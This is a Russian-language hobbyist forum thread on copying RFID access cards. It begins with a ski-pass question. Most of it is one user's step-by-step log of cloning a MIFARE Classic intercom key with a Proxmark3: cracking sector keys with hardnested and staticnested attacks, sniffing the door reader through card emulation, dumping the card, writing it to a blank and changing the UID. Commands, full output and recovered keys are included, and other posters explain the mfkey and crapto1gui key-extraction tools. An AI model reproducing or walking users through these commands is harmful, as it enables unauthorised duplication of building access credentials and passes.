Копирование Mifare

[Madijs 1]

простите за ошибки, русский мне не родной язик. очень хотелось понять што ето за карту. кто может помоч?

 

https://www.skidata.com/en/?type=200&file=24868&hash=3C80369BC515A6B78745EB70125B4AC295C4D8FAC774E69498F87437B2F951D1

 

 

[petr5555 270]

12 часов назад, Madijs сказал:

простите за ошибки, русский мне не родной язик. очень хотелось понять што ето за карту. кто может помоч?

 

https://www.skidata.com/en/?type=200&file=24868&hash=3C80369BC515A6B78745EB70125B4AC295C4D8FAC774E69498F87437B2F951D1

 

 

А вы хотите, чтобы вам тут по фотографии всё рассказали ?

 

Возьмите Проксмарк и посмотрите что это за карта .......

 

[urbanboy 154]

15 часов назад, Madijs сказал:

очень хотелось понять што ето за карту. кто может помоч?

вам это ни чего не даст - копировать такое бесполезно , баланс на сервере , вы не сможете скопировать пополненную и пользоваться потом без лимита

[Madijs 1]

я хочу сделать дубликат сезонного карта штоб могли с женой одновременно кататса. 

[Madijs 1]

6 часов назад, petr5555 сказал:

А вы хотите, чтобы вам тут по фотографии всё рассказали ?

 

Возьмите Проксмарк и посмотрите что это за карта .......

 

не бейте меня силно.😏 пока пытаюс понять, смогу я ето сделать или нет. с компюторам я на вы, проще сказать- чайник.😂

Проксмарk- имел виду такои? https://www.aliexpress.com/item/4000080578391.html?spm=a2g0o.productlist.0.0.6b2a4384S5gxJU&algo_pvid=d7457dbc-3124-4c15-a654-eb0a40e09a79&algo_expid=d7457dbc-3124-4c15-a654-eb0a40e09a79-7&btsid=0b0a555d16128831618061319ee7c3&ws_ab_test=searchweb0_0,searchweb201602_,searchweb201603_

[Prohor 49]

Скорее всего лимит будет общим на обоих картах, а возможно ли сделать копию и что это за чип может показать и нормальный смартфон с этой программой https://play.google.com/store/apps/details?id=com.nxp.taginfolite&hl=ru&gl=US 

[Kdc1803 0]

В ультралайте ведь 7ми байтный тоже уид наверное ж тоже можно уид от desfire записать

[Madijs 1]

такое палучилос

 

 

[Prohor 49]

Ну даже не знаю... Вроде читается полностью... Найти бы теперь заготовку на которую это можно записать...  Если таковая есть то может программа от той же конторы NFC TagWriter поможет склонировать...  

[Madijs 1]

што за тип карти ето палучаэтса? Mifare classic?

 

[Prohor 49]

совершенно точно не классик! Структура дампа совершенно иная. Послушаем что нам скажут старшие коллеги... 

[Madijs 1]

ждём...🙂

 

[Pavel 534]

Это

1 час назад, Madijs сказал:

што за тип карти ето палучаэтса? Mifare classic?

 

Это tag-it или iCode

Для её копирования нужен TMD-5S или SMKey, заготовки нужны вот эти https://ikey.ru/icode/
Проксмарк не умеет записывать эти заготовки.
Но гарантий нет, потому что у вас больше блоков, чем в заготовке. Заготовка имеет только 28 блоков, у вас 66. Заготовок на нужное кол-во страниц не существует, если система проверяет все данные, то ничего не получится. Если система проверяет только UID, а баланс или срок действия находится на сервере, в системе, то может быть и будет работать.

[Bespredel 1]

Здравствуйте.

Подскажите, как правильно выдернуть ключи с домофона.

Есть в наличии Proxmark3, давно валяется. Захотел мозги размять и пару запасных ключей от своего домофона сделать.

Но столкнулся с проблемой. Не буду долго всё расписывать, думаю знающие люди поймут.

Вот лог который смог выдернуть с карты:

[usb] pm3 --> hf 14a in

[+]  UID: 37 77 51 26
[+] ATQA: 00 04
[+]  SAK: 08 [2]
[+] Possible types:
[+]    MIFARE Classic 1K
[=] proprietary non iso14443-4 card found, RATS not supported
[#] 1 static nonce 01200145
[+] Static nonce: yes

[usb] pm3 --> hf mf chk *1 ?
[+] found keys:
[+] |-----|----------------|---|----------------|---|
[+] | Sec | key A          |res| key B          |res|
[+] |-----|----------------|---|----------------|---|
[+] | 000 | ------------   | 0 | ------------   | 0 |
[+] | 001 | ------------   | 0 | ------------   | 0 |
[+] | 002 | ------------   | 0 | ------------   | 0 |
[+] | 003 | ------------   | 0 | ------------   | 0 |
[+] | 004 | ------------   | 0 | ------------   | 0 |
[+] | 005 | ------------   | 0 | ------------   | 0 |
[+] | 006 | ------------   | 0 | ------------   | 0 |
[+] | 007 | ------------   | 0 | ------------   | 0 |
[+] | 008 | ------------   | 0 | ------------   | 0 |
[+] | 009 | ------------   | 0 | ------------   | 0 |
[+] | 010 | ------------   | 0 | ------------   | 0 |
[+] | 011 | ------------   | 0 | ------------   | 0 |
[+] | 012 | ------------   | 0 | ------------   | 0 |
[+] | 013 | ------------   | 0 | ------------   | 0 |
[+] | 014 | ------------   | 0 | ------------   | 0 |
[+] | 015 | ------------   | 0 | ------------   | 0 |
[+] |-----|----------------|---|----------------|---|
[+] ( 0:Failed / 1:Success)

[usb] pm3 --> hf mf hardnested r
[=] Target block no:  0, target key type:A, known target key: 0x000000000000 (not set)
[=] File action: read, Slow: No, Tests: 0
[+] Using AVX2 SIMD core.
 time    | #nonces | Activity                                                | expected to brute force
       0 |       0 | Start using 8 threads and AVX2 SIMD core                |               |
       0 |       0 | Brute force benchmark: 1226 million (2^30.2) keys/s     | 140737488355328 |   32h
       4 |       0 | Using 235 precalculated bitflip state tables            | 140737488355328 |   32h
       6 |       0 | Reading nonces from file hf-mf-37775126-nonces.bin...   | 140737488355328 |   32h
       6 |   44484 | Read 44484 nonces from file. cuid = 01200145            | 140737488355328 |   32h
       6 |   44484 | Target Block=1, Keytype=B                               | 140737488355328 |   32h
       6 |   44484 | (1. guess: Sum(a8) = 0)                                 |             0 |    0s
       8 |   44484 | Apply Sum(a8) and all bytes bitflip properties          |           nan |  nand
      11 |   44484 | (2. guess: Sum(a8) = 32)                                |           nan |  nand
      13 |   44484 | Apply Sum(a8) and all bytes bitflip properties          |           nan |  nand
      13 |   44484 | Brute force phase completed.  Key found: 351551c6540d   |

[usb] pm3 --> hf mf nested 1 0 A FFFFFFFFFFFF d
[#] 1 static nonce 01200145
[!] Static nonce detected. Quitting...

[usb] pm3 --> hf mf staticnested 1 1 B 351551c6540d
[#] 1 static nonce 01200145
[!] Wrong key. Can't authenticate to block:   1 key type: B
[usb] pm3 -->

Как понимаю, нужно в режиме снифера открыть дверь. Для этого нужно ноут найти, пару дней займёт.

Какой командой его снять? hf sniff  или hf mf sim u 37775126 x ?

Как расшифровать лог?

crapto1gui?

 

 

 

[petr5555 270]

7 часов назад, Bespredel сказал:

Здравствуйте.

Подскажите, как правильно выдернуть ключи с домофона.

Есть в наличии Proxmark3, давно валяется. Захотел мозги размять и пару запасных ключей от своего домофона сделать.

Но столкнулся с проблемой. Не буду долго всё расписывать, думаю знающие люди поймут.

Вот лог который смог выдернуть с карты:

[usb] pm3 --> hf 14a in

[+]  UID: 37 77 51 26
[+] ATQA: 00 04
[+]  SAK: 08 [2]
[+] Possible types:
[+]    MIFARE Classic 1K
[=] proprietary non iso14443-4 card found, RATS not supported
[#] 1 static nonce 01200145
[+] Static nonce: yes

[usb] pm3 --> hf mf chk *1 ?
[+] found keys:
[+] |-----|----------------|---|----------------|---|
[+] | Sec | key A          |res| key B          |res|
[+] |-----|----------------|---|----------------|---|
[+] | 000 | ------------   | 0 | ------------   | 0 |
[+] | 001 | ------------   | 0 | ------------   | 0 |
[+] | 002 | ------------   | 0 | ------------   | 0 |
[+] | 003 | ------------   | 0 | ------------   | 0 |
[+] | 004 | ------------   | 0 | ------------   | 0 |
[+] | 005 | ------------   | 0 | ------------   | 0 |
[+] | 006 | ------------   | 0 | ------------   | 0 |
[+] | 007 | ------------   | 0 | ------------   | 0 |
[+] | 008 | ------------   | 0 | ------------   | 0 |
[+] | 009 | ------------   | 0 | ------------   | 0 |
[+] | 010 | ------------   | 0 | ------------   | 0 |
[+] | 011 | ------------   | 0 | ------------   | 0 |
[+] | 012 | ------------   | 0 | ------------   | 0 |
[+] | 013 | ------------   | 0 | ------------   | 0 |
[+] | 014 | ------------   | 0 | ------------   | 0 |
[+] | 015 | ------------   | 0 | ------------   | 0 |
[+] |-----|----------------|---|----------------|---|
[+] ( 0:Failed / 1:Success)

[usb] pm3 --> hf mf hardnested r
[=] Target block no:  0, target key type:A, known target key: 0x000000000000 (not set)
[=] File action: read, Slow: No, Tests: 0
[+] Using AVX2 SIMD core.
 time    | #nonces | Activity                                                | expected to brute force
       0 |       0 | Start using 8 threads and AVX2 SIMD core                |               |
       0 |       0 | Brute force benchmark: 1226 million (2^30.2) keys/s     | 140737488355328 |   32h
       4 |       0 | Using 235 precalculated bitflip state tables            | 140737488355328 |   32h
       6 |       0 | Reading nonces from file hf-mf-37775126-nonces.bin...   | 140737488355328 |   32h
       6 |   44484 | Read 44484 nonces from file. cuid = 01200145            | 140737488355328 |   32h
       6 |   44484 | Target Block=1, Keytype=B                               | 140737488355328 |   32h
       6 |   44484 | (1. guess: Sum(a8) = 0)                                 |             0 |    0s
       8 |   44484 | Apply Sum(a8) and all bytes bitflip properties          |           nan |  nand
      11 |   44484 | (2. guess: Sum(a8) = 32)                                |           nan |  nand
      13 |   44484 | Apply Sum(a8) and all bytes bitflip properties          |           nan |  nand
      13 |   44484 | Brute force phase completed.  Key found: 351551c6540d   |

[usb] pm3 --> hf mf nested 1 0 A FFFFFFFFFFFF d
[#] 1 static nonce 01200145
[!] Static nonce detected. Quitting...

[usb] pm3 --> hf mf staticnested 1 1 B 351551c6540d
[#] 1 static nonce 01200145
[!] Wrong key. Can't authenticate to block:   1 key type: B
[usb] pm3 -->

Как понимаю, нужно в режиме снифера открыть дверь. Для этого нужно ноут найти, пару дней займёт.

Какой командой его снять? hf sniff  или hf mf sim u 37775126 x ?

Как расшифровать лог?

crapto1gui?

 

 

 

 

 

А где вы увидели лог ?

И что тут расшифровывать ?

Кроме типа ключа и его UID у вас ничего нет.........

 

А если хотите "размять мозги", то начинайте с детального знакомства с Проксмарком !

На одном "энтузазизме" тут ничего не получится. 

Нужно и подобрать прошивку под него и изучить его работу в разных режимах.......

 

 

 

[Bespredel 1]

3 часа назад, petr5555 сказал:

 

 

А где вы увидели лог ?

И что тут расшифровывать ?

Кроме типа ключа и его UID у вас ничего нет.........

 

А если хотите "размять мозги", то начинайте с детального знакомства с Проксмарком !

На одном "энтузазизме" тут ничего не получится. 

Нужно и подобрать прошивку под него и изучить его работу в разных режимах.......

 

 

 

Тут лог моих действий. Точнее единственная полезная информация. Остальные манипуляции имеют нулевую информацию.

Расшифровывать ничего не нужно.

Прошивки обновлены были сразу на iceman последней редакции. Документацию всю прочитал. По этой причине задал вопросы, т.к. в документации нет чётких ответов на них. Из уточнения, домофон метаком.

 

По сути вопрос, вполне конкретный. Какой командой перехватить обмен пакетов и чем декодировать его для получения ключа ячейки. Готового инструмента в репозитории не увидел.

В наличии есть программа crapto1gu. Эксперимент с перехватам смогу провести как будет ноут на руках. Пока собираю теоретическую информацию.

 

Давайте не будем спамить, хотелось услышать ответ специалиста на мой вопрос. Или ссылку на документ где он описан, на любом языке.

Перечитал много материала и везде вода. Процесс перехвата ключа плохо описан. Как полностью разберусь со всеми моментами, могу написать полную документацию по работе с данным прибором.

 

 

[petr5555 270]

2 часа назад, Bespredel сказал:

Тут лог моих действий. Точнее единственная полезная информация. Остальные манипуляции имеют нулевую информацию.

Расшифровывать ничего не нужно.

Прошивки обновлены были сразу на iceman последней редакции. Документацию всю прочитал. По этой причине задал вопросы, т.к. в документации нет чётких ответов на них. Из уточнения, домофон метаком.

 

По сути вопрос, вполне конкретный. Какой командой перехватить обмен пакетов и чем декодировать его для получения ключа ячейки. Готового инструмента в репозитории не увидел.

В наличии есть программа crapto1gu. Эксперимент с перехватам смогу провести как будет ноут на руках. Пока собираю теоретическую информацию.

 

Давайте не будем спамить, хотелось услышать ответ специалиста на мой вопрос. Или ссылку на документ где он описан, на любом языке.

Перечитал много материала и везде вода. Процесс перехвата ключа плохо описан. Как полностью разберусь со всеми моментами, могу написать полную документацию по работе с данным прибором.

 

 

Понятно, что вода.

Тоже пришлось ( в своё время )  выискивать и собирать эту информацию по кусочкам.

И первое что нашёл для Проксмарка - это HELP по командам .......

А как применять ? 

На форуме mr.Zorg уже довольно подробно об этом рассказывал.......  

 

Впрочем, я же не специалист.

Поэтому не буду вас больше утомлять своим спамом ........

 

 

 

 

 

[Bespredel 1]

1 час назад, petr5555 сказал:

Понятно, что вода.

Тоже пришлось ( в своё время )  выискивать и собирать эту информацию по кусочкам.

И первое что нашёл для Проксмарка - это HELP по командам .......

А как применять ? 

На форуме mr.Zorg уже довольно подробно об этом рассказывал.......  

 

Впрочем, я же не специалист.

Поэтому не буду вас больше утомлять своим спамом ........

 

 

 

 

 

Я вас услышал. Очередной водолей. 

Все команды изучил и у меня всего два варианта как и написал в первом сообщении  "hf sniff  или hf mf sim u 37775126 x ?"

Вместо конкретной информации, рассуждения какой я умный, корона нимб не царапает?

Завтра будет бук на руках, сам на месте разберусь.

 

Судя по этим записям я правильно рассуждал:

https://cheatography.com/countparadox/cheat-sheets/proxmark3/

[the_d_kid 52]

11 часов назад, Bespredel сказал:

Я вас услышал. Очередной водолей. 

Все команды изучил и у меня всего два варианта как и написал в первом сообщении  "hf sniff  или hf mf sim u 37775126 x ?"

Вместо конкретной информации, рассуждения какой я умный, корона нимб не царапает?

Завтра будет бук на руках, сам на месте разберусь.

 

Судя по этим записям я правильно рассуждал:

https://cheatography.com/countparadox/cheat-sheets/proxmark3/

Опять хочу извиниться за наш форум 🙄
hf mf sim - работает по принципу SMKEY. То есть проксмарк делает вид что он ключ и пытается захватить крипто из считки, но на сколько мне известно - считыватели Iron Logic уже давно дурят мозг всяким мусором в эфире как раз что бы затруднить работу проксмарка и смкея, и ещё года два назад на новых считках hf mf sim не отдавал вообще верных ключей или даже не рассчитывал их
но вообще если бы получилось, то прокс отдаёт данные, которые надо скормить mfkey32/64 или mfkeyv2_32/64 (или как то так), я помнится три версии этой проги находил и все они работали с переменным успехом
hf mf sniff - как раз перехватывает трафик полностью, то есть перехватывает от ключа до считки. И оттуда уже вполне реально наковырять нормальные данные, но с считками от Iron Logic я не проверял, не уверен что смогу выковырять. И как раз для этой команды нужна прога crapto1gui, и нужно будет самому из огромного лога обмена данных ковырять нужные данные. Попробую подсказать, какие данные дергать, если сумеете получить лог обмена

[the_d_kid 52]

В 10.02.2021 в 03:09, Bespredel сказал:

Brute force phase completed.  Key found: 351551c6540d

так, а этот ключ откуда у вас взялся? он точно не подходит ни к одному сектору вашей карты? откуда тогда он? 😄

[Bespredel 1]

6 часов назад, the_d_kid сказал:

Опять хочу извиниться за наш форум 🙄
hf mf sim - работает по принципу SMKEY. То есть проксмарк делает вид что он ключ и пытается захватить крипто из считки, но на сколько мне известно - считыватели Iron Logic уже давно дурят мозг всяким мусором в эфире как раз что бы затруднить работу проксмарка и смкея, и ещё года два назад на новых считках hf mf sim не отдавал вообще верных ключей или даже не рассчитывал их
но вообще если бы получилось, то прокс отдаёт данные, которые надо скормить mfkey32/64 или mfkeyv2_32/64 (или как то так), я помнится три версии этой проги находил и все они работали с переменным успехом
hf mf sniff - как раз перехватывает трафик полностью, то есть перехватывает от ключа до считки. И оттуда уже вполне реально наковырять нормальные данные, но с считками от Iron Logic я не проверял, не уверен что смогу выковырять. И как раз для этой команды нужна прога crapto1gui, и нужно будет самому из огромного лога обмена данных ковырять нужные данные. Попробую подсказать, какие данные дергать, если сумеете получить лог обмена

Большое спасибо  за разъяснение.  Я так же рассуждал, но это теория, хотел подтверждения от практиков. Про мусор в эфире вообще не знал.

Много думал как использовать Proxmerk3 автономно. Единственная мысль взять Raspberry Pi Zero c Wi-Fi и настроить его в как шлюз для управления телефона. Чтоб это имело компактный, носимый с собой инструмент. Но это не оправданные дополнительные расходы. Или с ноутом постоять у считывателя. Но у нас холодно -30 и это крайне неудобно будет. 

По идее proxmerk3 имеет автономные функции, но не совсем понял как их настроить. Единственное что по удержанию кнопки он переходит в режим считывания банковских карт. Причём карту СберБанка через NFC телефона успешно выдернул. Чему я изрядна удивился. И прекратил эксперимент. Т.к. не уверен, что данное ПО не сольёт данные карты в сеть.

[Bespredel 1]

6 часов назад, the_d_kid сказал:

так, а этот ключ откуда у вас взялся? он точно не подходит ни к одному сектору вашей карты? откуда тогда он? 😄

Как видно из лога, данный ключ я получил применив команду :

hf mf hardnested r

На всё ушло секунд 20. И судя по описанию это ключ от :

Target Block=1, Keytype=B

То есть при попытки стандартного перебора получаем:

[usb] pm3 --> hf mf nested 1 0 A 351551c6540d d
[#] 1 static nonce 01200145
[!] Static nonce detected. Quitting...
[=]      Try use `hf mf staticnested`

Далее выдаёт ошибку:

[usb] pm3 --> hf mf staticnested 1 1 B 351551c6540d
[#] 1 static nonce 01200145
[!] Wrong key. Can't authenticate to block:   1 key type: B

Ещё мне непонятно, что в принципе означает этот "nonce".

Он говорит, обнаружен "1 static nonce". Внятного описания не нашёл, что это такое и с чем его едят.

 

Думаю вечером будет бук на руках, продолжу копать.

 

[Bespredel 1]

Пошла мазута по трубам.

Ключ с ридера выдернул с первой попытки.

Команда hf mf sim u 37775126 i x  и proxmark3 к домофону.

Автоматом всё заполнилось и выдал ключ к 0 А.

Далее метку на proxmark3 и команда hf mf staticnested 1 0 key d 

Начал что-то долго перебирать. Ищет по 4 блока к A потом видимо будет к B,  каждый блок по 15 минут. Сижу жду..

32/4= 8 * 15 = 120 Два часа на A и два часа на B. Блин, четыре часа ковырять один ключ. Мда...

Потом отредактирую это сообщение с точным описание действий или напишу ниже.

 

Смог найти информацию по моей карте.

Тут разработчики обсуждают проблему с картами Mifare Classic with fixed nonce 

https://github.com/Proxmark/proxmark3/issues/899

 

В подсчётах времени вроде ошибся, разработчики говорят так:

- Optimal, 78000 * 5ms = 390 000ms, about 6.5 minutes. 
- Current impl, 78000 * 12ms = 936 000ms, about 15.6 minutes. 
That would be 1 key, 1 known, 30 to go for a 1K card.
31 * 6.5 = 201.5 min, 3.35 hours.
31 * 15 = 465 -ish, 7.75 ish hours..

8 часов, можно идти спать.

 

Пример как выглядит процесс с обычной картой и моей:

Normal PRNG card:

proxmark3> hf mf nested o 0 A 3EEAE3978468 6 A
--nested. sectors: 1, block no:  0, key type:A, eml:n, dmp=n checktimeout=471 us
--target block no:  6, target key type:A
uid:0a8be6dd trgbl=6 trgkey=0
statelist 0: length:17388 block:06 keytype:0 nt:9D7905A3 ks1:46EFDC3D
statelist 1: length:23169 block:06 keytype:0 nt:4745947E ks1:566BD77D
We have 1 key(s) to check.
Found valid key:a7c6e67ebf4b
proxmark3> 


Fixed nonce card:

proxmark3> hf mf nested o 0 A a0a1a2a3a4a5 7 A
--nested. sectors: 1, block no:  0, key type:A, eml:n, dmp=n checktimeout=471 us
--target block no:  7, target key type:A
#db# Nonce#2: cannot get nonce that != nonce#1, continuing anyway with single nonce! ntdist=160
uid:xxxxxxxx trgbl=7 trgkey=0
statelist 0: length:67272 block:07 keytype:0 nt:7EEF3586 ks1:802DEAB4
statelist 1: length:67272 block:07 keytype:0 nt:7EEF3586 ks1:802DEAB4
Nonce 1 and 2 are the same!
We have 67272 keys to check. This will take a very long time!
Press button to abort.
Keys left to check: 67272
...         
Keys left to check: 65232
Key found after checking 2125 keys

Found valid key:2a010a108e03
proxmark3> 

 

 

Очень похоже на то, что данные карты используют одноразовые ключи в своей памяти.

В общем мне повезло и с первого знакомства с proxmark3 попался не тривиальный ключ.

Правда остаётся вопрос, а на какие карты его копировать, есть ли болванки на них?

А SMKEY умеет ломать такие ключи?

[Bespredel 1]

Результат есть. Ключ скопирован и записан на обычную болванку, домофон его опознаёт, открывает.

Но остались вопросы..

 

На утро я увидел, что перебор закончился с ошибкой. Судя по всему proxmark3 перегрелся ил хз что.

Поставил на него вентилятор и запустил по новой.

К вечеру получил результат, в логах много ошибок, 90% удалил:

Цитата

[usb] pm3 --> hf mf staticnested 1 0 a a7950bf902bf d
[#] 1 static nonce 01200145
[+] Testing known keys. Sector count 16
..[=] Chunk: 4.3s | found 2/32 keys (24)
[+] Time to check 23 known keys: 4 seconds

[+] enter static nested key recovery
[+] Found 75374 key candidates
[|] 75348/75374 keys | 135.7 keys/sec | worst case    0.2 seconds
[+] target block:  4 key type: A

[+] Found 65684 key candidates
[-] 65604/65684 keys | 135.6 keys/sec | worst case    0.6 seconds
[+] target block:  8 key type: A

[+] Found 86818 key candidates
[\]  2688/86818 keys | 135.1 keys/sec | worst case  622.6 seconds[#] Card didn't answer to select
[\]  6384/86818 keys | 135.3 keys/sec | worst case  594.4 seconds[#] Card didn't answer to select
[|] 86772/86818 keys | 135.6 keys/sec | worst case    0.3 seconds
[+] target block: 12 key type: A

[+] Found 65249 key candidates
[-]  7140/65249 keys | 135.6 keys/sec | worst case  428.5 seconds[#] BCC0 incorrect, got 0x1b, expected 0x9b
[|] 59724/65249 keys | 135.6 keys/sec | worst case   40.7 seconds[#] Card didn't answer to select
[/] 65184/65249 keys | 135.6 keys/sec | worst case    0.5 seconds
[+] target block: 16 key type: A

[+] Found 122643 key candidates
[\]    84/122643 keys | 137.9 keys/sec | worst case  888.6 seconds[#] BCC0 incorrect, got 0x1b, expected 0x9b
[-]122640/122643 keys | 135.4 keys/sec | worst case    0.0 seconds
[+] target block: 20 key type: A

[+] Found 54449 key candidates
[/]  1512/54449 keys | 135.8 keys/sec | worst case  389.7 seconds[#] BCC0 incorrect, got 0x1b, expected 0x9b
[#] Aborting
[\] 23520/54449 keys | 135.6 keys/sec | worst case  228.1 seconds[#] Card didn't answer to select
[\] 54432/54449 keys | 135.7 keys/sec | worst case    0.1 seconds
[+] target block: 24 key type: A

[+] Found 35042 key candidates
[\]  5964/35042 keys | 135.7 keys/sec | worst case  214.2 seconds[#] BCC0 incorrect, got 0x1b, expected 0x9b
[#] Aborting
[/] 35028/35042 keys | 135.8 keys/sec | worst case    0.1 seconds
[+] target block: 28 key type: A

[+] Found 59682 key candidates
[-]  9744/59682 keys | 135.7 keys/sec | worst case  368.1 seconds[#] Card didn't answer to select
[|] 59640/59682 keys | 135.7 keys/sec | worst case    0.3 seconds
[+] target block: 32 key type: A

[+] Found 48225 key candidates
[\] 48216/48225 keys | 135.7 keys/sec | worst case    0.1 seconds
[+] target block: 36 key type: A

[+] Found 36055 key candidates
[/] 36036/36055 keys | 135.8 keys/sec | worst case    0.1 seconds
[+] target block: 40 key type: A

[+] Found 34462 key candidates
[|] 34440/34462 keys | 135.7 keys/sec | worst case    0.2 seconds
[+] target block: 44 key type: A

[+] Found 88453 key candidates
[-] 88452/88453 keys | 135.7 keys/sec | worst case    0.0 seconds
[+] target block: 48 key type: A

[+] Found 57571 key candidates
[|] 57540/57571 keys | 135.7 keys/sec | worst case    0.2 seconds
[+] target block: 52 key type: A

[+] Found 109066 key candidates
[-]  8820/109066 keys | 135.5 keys/sec | worst case  739.9 seconds[#] Card didn't answer to select
[\]109032/109066 keys | 135.2 keys/sec | worst case    0.3 seconds
[+] target block: 56 key type: A

[+] Found 61163 key candidates
[/]    84/61163 keys | 141.4 keys/sec | worst case  431.9 seconds[#] Card didn't answer to select
[|] 61152/61163 keys | 136.7 keys/sec | worst case    0.1 seconds
[+] target block: 60 key type: A

[+] Found 77238 key candidates
[|] 77196/77238 keys | 135.6 keys/sec | worst case    0.3 seconds
[+] target block:  4 key type: B

[+] Found 77238 key candidates
[/] 12096/77238 keys | 135.6 keys/sec | worst case  480.5 seconds[#] Card didn't answer to select
[|] 77196/77238 keys | 135.6 keys/sec | worst case    0.3 seconds
[+] target block:  8 key type: B

[+] Found 77238 key candidates
[#] Card didn't answer to select
[-]    84/77238 keys | 134.4 keys/sec | worst case  574.1 seconds[#] Card didn't answer to select
[|] 77196/77238 keys | 135.6 keys/sec | worst case    0.3 seconds
[+] target block: 12 key type: B

[+] Found 77238 key candidates
[|] 77196/77238 keys | 135.6 keys/sec | worst case    0.3 seconds
[+] target block: 20 key type: B

[+] Found 77238 key candidates
[|] 77196/77238 keys | 135.6 keys/sec | worst case    0.3 seconds
[+] target block: 24 key type: B

[+] Found 77238 key candidates
[/] 73584/77238 keys | 137.1 keys/sec | worst case   26.7 seconds[#] Card didn't answer to select
[|] 77196/77238 keys | 137.1 keys/sec | worst case    0.3 seconds
[+] target block: 28 key type: B

[+] Found 77238 key candidates
[|] 77196/77238 keys | 135.6 keys/sec | worst case    0.3 seconds
[+] target block: 32 key type: B

[+] Found 77238 key candidates
[#] Aborting
[|] 77196/77238 keys | 135.6 keys/sec | worst case    0.3 seconds
[+] target block: 36 key type: B

[+] Found 77238 key candidates
[|] 77196/77238 keys | 135.6 keys/sec | worst case    0.3 seconds
[+] target block: 40 key type: B

[+] Found 77238 key candidates
[\]  1176/77238 keys | 134.8 keys/sec | worst case  564.1 seconds[#] Card didn't answer to select
[|] 77196/77238 keys | 135.6 keys/sec | worst case    0.3 seconds
[+] target block: 44 key type: B

[+] Found 77238 key candidates
[|]   252/77238 keys | 134.4 keys/sec | worst case  572.8 seconds[#] Card didn't answer to select
[|] 77196/77238 keys | 135.6 keys/sec | worst case    0.3 seconds
[+] target block: 48 key type: B

[+] Found 77238 key candidates
[|] 77196/77238 keys | 135.7 keys/sec | worst case    0.3 seconds
[+] target block: 52 key type: B

[+] Found 77238 key candidates
[|] 77196/77238 keys | 141.2 keys/sec | worst case    0.3 seconds
[+] target block: 56 key type: B

[+] Found 77238 key candidates
[|] 77196/77238 keys | 141.3 keys/sec | worst case    0.3 seconds
[+] target block: 60 key type: B

[+] time in static nested 15894 seconds

[=] trying to read key B...

[+] found keys:
[+] |-----|----------------|---|----------------|---|
[+] | Sec | key A          |res| key B          |res|
[+] |-----|----------------|---|----------------|---|
[+] | 000 | a7950bf902bf   | 1 | fb76ffaa8ae5   | 1 |
[+] | 001 | ------------   | 0 | ------------   | 0 |
[+] | 002 | ------------   | 0 | ------------   | 0 |
[+] | 003 | ------------   | 0 | ------------   | 0 |
[+] | 004 | ------------   | 0 | ------------   | 0 |
[+] | 005 | ------------   | 0 | ------------   | 0 |
[+] | 006 | ------------   | 0 | ------------   | 0 |
[+] | 007 | ------------   | 0 | ------------   | 0 |
[+] | 008 | ------------   | 0 | ------------   | 0 |
[+] | 009 | ------------   | 0 | ------------   | 0 |
[+] | 010 | ------------   | 0 | ------------   | 0 |
[+] | 011 | ------------   | 0 | ------------   | 0 |
[+] | 012 | ------------   | 0 | ------------   | 0 |
[+] | 013 | ------------   | 0 | ------------   | 0 |
[+] | 014 | ------------   | 0 | ------------   | 0 |
[+] | 015 | ------------   | 0 | ------------   | 0 |
[+] |-----|----------------|---|----------------|---|
[+] ( 0:Failed / 1:Success)
[+] Generating binary key file
[+] Found keys have been dumped to hf-mf-37775126-key-1.bin
[=] FYI! --> 0xFFFFFFFFFFFF <-- has been inserted for unknown keys where res is 0
[usb] pm3 -->

 

 

О как. Думал он подберёт ключи ко всем блокам. Добавился только ключ 0 B.

Содержимое не очень информативно:

[usb] pm3 --> hf mf rdbl 0 A a7950bf902bf
--block no 0, key A - A7 95 0B F9 02 BF
data: 37 21 51 26 37 09 04 00 61 63 64 65 66 67 68 69
[usb] pm3 --> hf mf rdbl 0 B fb76ffaa8ae5
--block no 0, key B - FB 76 FF AA 8A E5
data: 37 21 51 26 37 09 04 00 61 63 64 65 66 67 68 69

 

Делаем дампы и заливаем в болванку, меняем ИД.

[usb] pm3 --> hf mf chk *1 ? d dd.dic
[+] Loaded  2 keys from dd.dic
................................
[=] time in checkkeys 2 seconds

[=] testing to read key B...

[+] found keys:
[+] |-----|----------------|---|----------------|---|
[+] | Sec | key A          |res| key B          |res|
[+] |-----|----------------|---|----------------|---|
[+] | 000 | a7950bf902bf   | 1 | fb76ffaa8ae5   | 1 |
[+] | 001 | ------------   | 0 | ------------   | 0 |
[+] | 002 | ------------   | 0 | ------------   | 0 |
[+] | 003 | ------------   | 0 | ------------   | 0 |
[+] | 004 | ------------   | 0 | ------------   | 0 |
[+] | 005 | ------------   | 0 | ------------   | 0 |
[+] | 006 | ------------   | 0 | ------------   | 0 |
[+] | 007 | ------------   | 0 | ------------   | 0 |
[+] | 008 | ------------   | 0 | ------------   | 0 |
[+] | 009 | ------------   | 0 | ------------   | 0 |
[+] | 010 | ------------   | 0 | ------------   | 0 |
[+] | 011 | ------------   | 0 | ------------   | 0 |
[+] | 012 | ------------   | 0 | ------------   | 0 |
[+] | 013 | ------------   | 0 | ------------   | 0 |
[+] | 014 | ------------   | 0 | ------------   | 0 |
[+] | 015 | ------------   | 0 | ------------   | 0 |
[+] |-----|----------------|---|----------------|---|
[+] ( 0:Failed / 1:Success)
[+] Generating binary key file
[+] Found keys have been dumped to hf-mf-37775126-key.bin
[=] FYI! --> 0xFFFFFFFFFFFF <-- has been inserted for unknown keys where res is 0

[usb] pm3 --> hf mf dump 1
[=] Using `hf-mf-37775126-key.bin`
[=] Reading sector access bits...
..[#] Auth error
[+] time: 26 seconds
[+] Succeeded in dumping all blocks

[+] saved 1024 bytes to binary file hf-mf-37775126-dump-1.bin
[+] saved 64 blocks to text file hf-mf-37775126-dump-1.eml
[+] saved to json file hf-mf-37775126-dump-1.json

[usb] pm3 --> hf mf restore 1 u 37775126 k hf-mf-37775126-key.bin

[usb] pm3 --> hf mf csetuid 37775126
--wipe card:NO  uid:D9 BE 69 02
[+] Old UID : D9 BE 69 02
[+] New UID : 37 77 51 26

Всё работает.

 

Далее самое интересное.

Беру второй ключ от домофона, решаю повторить всё с начала, но с небольшой разницей.

[usb] pm3 --> hf sea
[-] Searching for ISO14443-A tag...
[+]  UID: D9 BE 69 02
[+] ATQA: 00 04
[+]  SAK: 08 [2]
[+] Possible types:
[+]    MIFARE Classic 1K
[=] proprietary non iso14443-4 card found, RATS not supported
[#] 1 static nonce 01200145
[+] Static nonce: yes


идём к домофону, эмулируем карту
[usb] pm3 --> hf mf sim u D9BE6902 i x
[=] MIFARE  | 4 byte UID  D9 BE 69 02
[=] Options [ numreads: 0, flags: 35 (0x23) ]
[=] Press pm3-button or send another cmd to abort simulation
[#] 4B UID: d9be6902
